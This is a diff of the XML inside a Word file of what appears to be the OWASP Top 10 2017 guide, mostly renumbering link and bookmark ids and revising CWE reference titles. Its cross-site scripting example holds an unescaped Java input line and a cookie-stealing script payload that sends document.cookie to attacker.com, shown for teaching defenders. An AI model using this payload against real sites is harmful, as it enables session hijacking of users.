             <w:rStyle w:val="Hyperlink"/>
@@ -1289,7 +1259,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1306,7 +1276,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1323,7 +1293,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1336,8 +1306,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="external"/>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkStart w:id="39" w:name="external"/>
+      <w:bookmarkEnd w:id="39"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -1350,7 +1320,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1367,7 +1337,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1384,7 +1354,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1401,7 +1371,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1418,7 +1388,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1431,8 +1401,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="a2-authentication-and-session-management"/>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkStart w:id="40" w:name="a2-authentication-and-session-management"/>
+      <w:bookmarkEnd w:id="40"/>
       <w:r>
         <w:t xml:space="preserve">A2 Authentication and Session Management</w:t>
       </w:r>
@@ -1689,8 +1659,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="43" w:name="am-i-vulnerable-to-attack-1"/>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkStart w:id="41" w:name="am-i-vulnerable-to-attack-1"/>
+      <w:bookmarkEnd w:id="41"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -1811,8 +1781,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="how-do-i-prevent-1"/>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkStart w:id="42" w:name="how-do-i-prevent-1"/>
+      <w:bookmarkEnd w:id="42"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -1825,7 +1795,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId45">
+      <w:hyperlink r:id="rId43">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1927,7 +1897,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId46">
+      <w:hyperlink r:id="rId44">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1944,7 +1914,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId47">
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1960,8 +1930,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="48" w:name="example-scenarios-1"/>
-      <w:bookmarkEnd w:id="48"/>
+      <w:bookmarkStart w:id="46" w:name="example-scenarios-1"/>
+      <w:bookmarkEnd w:id="46"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -1985,7 +1955,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId49">
+      <w:hyperlink r:id="rId47">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2033,7 +2003,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId50">
+      <w:hyperlink r:id="rId48">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2049,8 +2019,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="references-1"/>
-      <w:bookmarkEnd w:id="51"/>
+      <w:bookmarkStart w:id="49" w:name="references-1"/>
+      <w:bookmarkEnd w:id="49"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -2059,8 +2029,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="owasp-1"/>
-      <w:bookmarkEnd w:id="52"/>
+      <w:bookmarkStart w:id="50" w:name="owasp-1"/>
+      <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -2073,7 +2043,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId46">
+      <w:hyperlink r:id="rId44">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2090,7 +2060,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId47">
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2107,7 +2077,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId47">
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2124,7 +2094,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId53">
+      <w:hyperlink r:id="rId51">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2141,7 +2111,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId54">
+      <w:hyperlink r:id="rId52">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2158,7 +2128,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId55">
+      <w:hyperlink r:id="rId53">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2175,7 +2145,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId56">
+      <w:hyperlink r:id="rId54">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2192,7 +2162,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId57">
+      <w:hyperlink r:id="rId55">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2209,7 +2179,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId58">
+      <w:hyperlink r:id="rId56">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2222,8 +2192,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="external-1"/>
-      <w:bookmarkEnd w:id="59"/>
+      <w:bookmarkStart w:id="57" w:name="external-1"/>
+      <w:bookmarkEnd w:id="57"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -2236,12 +2206,12 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId60">
+      <w:hyperlink r:id="rId58">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">CWE Entry 287 on Improper Authentication</w:t>
+          <w:t xml:space="preserve">CWE-287: Improper Authentication</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -2253,12 +2223,12 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId61">
+      <w:hyperlink r:id="rId59">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">CWE Entry 384 on Session Fixation</w:t>
+          <w:t xml:space="preserve">CWE-384: Session Fixation</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -2266,8 +2236,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="62" w:name="a3-cross-site-scripting"/>
-      <w:bookmarkEnd w:id="62"/>
+      <w:bookmarkStart w:id="60" w:name="a3-cross-site-scripting"/>
+      <w:bookmarkEnd w:id="60"/>
       <w:r>
         <w:t xml:space="preserve">A3 Cross Site Scripting</w:t>
       </w:r>
@@ -2516,8 +2486,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="63" w:name="am-i-vulnerable-to-attack-2"/>
-      <w:bookmarkEnd w:id="63"/>
+      <w:bookmarkStart w:id="61" w:name="am-i-vulnerable-to-attack-2"/>
+      <w:bookmarkEnd w:id="61"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -2548,8 +2518,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="64" w:name="how-do-i-prevent-2"/>
-      <w:bookmarkEnd w:id="64"/>
+      <w:bookmarkStart w:id="62" w:name="how-do-i-prevent-2"/>
+      <w:bookmarkEnd w:id="62"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -2594,7 +2564,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId65">
+      <w:hyperlink r:id="rId63">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2613,8 +2583,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="example-scenarios-2"/>
-      <w:bookmarkEnd w:id="66"/>
+      <w:bookmarkStart w:id="64" w:name="example-scenarios-2"/>
+      <w:bookmarkEnd w:id="64"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -2632,63 +2602,42 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(String) page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The attacker modifies the ‘CC’ parameter in his browser to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
+      </w:r>
+      <w:r>
         <w:br w:type="textWrapping"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">(String) page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The attacker modifies the ‘CC’ parameter in his browser to:</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">'&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">document.location= '</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId67">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">http://www.attacker.com/cgi-bin/cookie.cgi</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">? foo='+document.cookie</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">'.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See 2017-A8 for info on CSRF.</w:t>
       </w:r>
     </w:p>
@@ -2696,8 +2645,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="68" w:name="references-2"/>
-      <w:bookmarkEnd w:id="68"/>
+      <w:bookmarkStart w:id="65" w:name="references-2"/>
+      <w:bookmarkEnd w:id="65"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -2718,7 +2667,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2735,7 +2684,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2752,7 +2701,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2801,8 +2750,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="a4-access-control"/>
-      <w:bookmarkEnd w:id="69"/>
+      <w:bookmarkStart w:id="66" w:name="a4-access-control"/>
+      <w:bookmarkEnd w:id="66"/>
       <w:r>
         <w:t xml:space="preserve">A4 Access Control</w:t>
       </w:r>
@@ -3059,8 +3008,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="70" w:name="am-i-vulnerable-to-attack-3"/>
-      <w:bookmarkEnd w:id="70"/>
+      <w:bookmarkStart w:id="67" w:name="am-i-vulnerable-to-attack-3"/>
+      <w:bookmarkEnd w:id="67"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -3208,8 +3157,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="71" w:name="how-do-i-prevent-3"/>
-      <w:bookmarkEnd w:id="71"/>
+      <w:bookmarkStart w:id="68" w:name="how-do-i-prevent-3"/>
+      <w:bookmarkEnd w:id="68"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -3424,8 +3373,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="example-scenarios-3"/>
-      <w:bookmarkEnd w:id="72"/>
+      <w:bookmarkStart w:id="69" w:name="example-scenarios-3"/>
+      <w:bookmarkEnd w:id="69"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -3531,8 +3480,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="73" w:name="references-3"/>
-      <w:bookmarkEnd w:id="73"/>
+      <w:bookmarkStart w:id="70" w:name="references-3"/>
+      <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -3541,8 +3490,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="74" w:name="owasp-2"/>
-      <w:bookmarkEnd w:id="74"/>
+      <w:bookmarkStart w:id="71" w:name="owasp-2"/>
+      <w:bookmarkEnd w:id="71"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -3555,7 +3504,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId75">
+      <w:hyperlink r:id="rId72">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3572,7 +3521,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId47">
+      <w:hyperlink r:id="rId45">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3589,7 +3538,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId76">
+      <w:hyperlink r:id="rId73">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3606,7 +3555,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId77">
+      <w:hyperlink r:id="rId74">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3619,8 +3568,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="78" w:name="external-2"/>
-      <w:bookmarkEnd w:id="78"/>
+      <w:bookmarkStart w:id="75" w:name="external-2"/>
+      <w:bookmarkEnd w:id="75"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -3633,12 +3582,12 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId79">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">CWE Entry 284 on Improper Access Control (Authorization)</w:t>
+          <w:t xml:space="preserve">CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -3650,21 +3599,55 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId80">
+      <w:hyperlink r:id="rId76">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">CWE Entry 639 on Insecure Direct Object References</w:t>
+          <w:t xml:space="preserve">CWE-284: Improper Access Control (Authorization)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1018"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId77">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">CWE-285: Improper Authorization</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1018"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId78">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">CWE-639: Authorization Bypass Through User-Controlled Key</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="81" w:name="a5-security-misconfiguration"/>
-      <w:bookmarkEnd w:id="81"/>
+      <w:bookmarkStart w:id="79" w:name="a5-security-misconfiguration"/>
+      <w:bookmarkEnd w:id="79"/>
       <w:r>
         <w:t xml:space="preserve">A5 Security Misconfiguration</w:t>
       </w:r>
@@ -3913,10 +3896,170 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="82" w:name="am-i-vulnerable-to-attack-4"/>
+      <w:bookmarkStart w:id="80" w:name="am-i-vulnerable-to-attack-4"/>
+      <w:bookmarkEnd w:id="80"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is your application missing the proper security hardening across any part of the application stack? Including:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are default accounts and their passwords still enabled and unchanged?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Does your error handling reveal stack traces or other overly informative error messages to users?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Do you still use ancient configs with updated software?</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Do you adhere on obsolete backward compatibility?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is any of your software out of date? (see 2017-A9)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Without a concerted, repeatable application security configuration process, systems are at a higher risk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="81" w:name="how-do-i-prevent-4"/>
+      <w:bookmarkEnd w:id="81"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The primary recommendations are to establish all of the following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see 2017-A9). Get get accustomed to new security features.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">A strong application architecture that provides effective, secure separation between components.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">An automated process to verify independently the efficiency of the configs and settings in all environments.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="82" w:name="example-scenarios-4"/>
       <w:bookmarkEnd w:id="82"/>
       <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3924,210 +4067,50 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Is your application missing the proper security hardening across any part of the application stack? Including:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are default accounts and their passwords still enabled and unchanged?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Does your error handling reveal stack traces or other overly informative error messages to users?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Do you still use ancient configs with updated software?</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Do you adhere on obsolete backward compatibility?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
